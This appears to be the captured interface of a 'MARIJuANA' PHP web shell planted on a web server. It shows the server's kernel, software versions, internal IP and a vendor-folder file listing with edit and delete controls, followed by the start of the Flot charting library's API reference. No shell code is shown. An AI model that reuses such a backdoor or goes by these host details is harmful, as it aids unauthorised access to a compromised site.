MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux ip-172-26-15-81 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
  SOFT : Apache/2.4.41 (Ubuntu) PHP : 7.4.3-4ubuntu2.29
/var/www/studentcon/manage/vendors/Flot/
172.26.15.81

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
examples dir drwxr-xr-x 2018-08-01 01:23 R D
.bower.json 0.406 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
.gitignore 0.039 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
.travis.yml 0.034 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
API.md 52.316 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
CONTRIBUTING.md 3.166 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
FAQ.md 3.161 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
LICENSE.txt 1.044 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
Makefile 0.278 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
NEWS.md 39.346 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
PLUGINS.md 4.238 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
README.md 3.693 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
component.json 0.111 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
excanvas.js 40.96 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
excanvas.min.js 18.861 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
flot.jquery.json 0.817 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.colorhelpers.js 6.007 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.canvas.js 9.374 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.categories.js 5.892 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.crosshair.js 5.292 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.errorbars.js 12.318 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.fillbetween.js 5.134 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.image.js 7.188 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.js 120.089 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.navigate.js 13.883 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.pie.js 23.251 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.resize.js 3.236 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.selection.js 12.833 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.stack.js 6.924 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.symbol.js 2.446 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.threshold.js 4.375 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.flot.time.js 11.492 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
jquery.js 259.821 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
package.json 0.15 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
REQUEST EXIT
# Flot Reference # **Table of Contents** [Introduction](#introduction) | [Data Format](#data-format) | [Plot Options](#plot-options) | [Customizing the legend](#customizing-the-legend) | [Customizing the axes](#customizing-the-axes) | [Multiple axes](#multiple-axes) | [Time series data](#time-series-data) | [Customizing the data series](#customizing-the-data-series) | [Customizing the grid](#customizing-the-grid) | [Specifying gradients](#specifying-gradients) | [Plot Methods](#plot-methods) | [Hooks](#hooks) | [Plugins](#plugins) | [Version number](#version-number) --- ## Introduction ## Consider a call to the plot function: ```js var plot = $.plot(placeholder, data, options) ``` The placeholder is a jQuery object or DOM element or jQuery expression that the plot will be put into. This placeholder needs to have its width and height set as explained in the [README](README.md) (go read that now if you haven't, it's short). The plot will modify some properties of the placeholder so it's recommended you simply pass in a div that you don't use for anything else. Make sure you check any fancy styling you apply to the div, e.g. background images have been reported to be a problem on IE 7. The plot function can also be used as a jQuery chainable property. This form naturally can't return the plot object directly, but you can still access it via the 'plot' data key, like this: ```js var plot = $("#placeholder").plot(data, options).data("plot"); ``` The format of the data is documented below, as is the available options. The plot object returned from the call has some methods you can call. These are documented separately below. Note that in general Flot gives no guarantees if you change any of the objects you pass in to the plot function or get out of it since they're not necessarily deep-copied. ## Data Format ## The data is an array of data series: ```js [ series1, series2, ... ] ``` A series can either be raw data or an object with properties. The raw data format is an array of points: ```js [ [x1, y1], [x2, y2], ... ] ``` E.g. ```js [ [1, 3], [2, 14.01], [3.5, 3.14] ] ``` Note that to simplify the internal logic in Flot both the x and y values must be numbers (even if specifying time series, see below for how to do this). This is a common problem because you might retrieve data from the database and serialize them directly to JSON without noticing the wrong type. If you're getting mysterious errors, double check that you're inputting numbers and not strings. If a null is specified as a point or if one of the coordinates is null or couldn't be converted to a number, the point is ignored when drawing. As a special case, a null value for lines is interpreted as a line segment end, i.e. the points before and after the null value are not connected. Lines and points take two coordinates. For filled lines and bars, you can specify a third coordinate which is the bottom of the filled area/bar (defaults to 0). The format of a single series object is as follows: ```js { color: color or number data: rawdata label: string lines: specific lines options bars: specific bars options points: specific points options xaxis: number yaxis: number clickable: boolean hoverable: boolean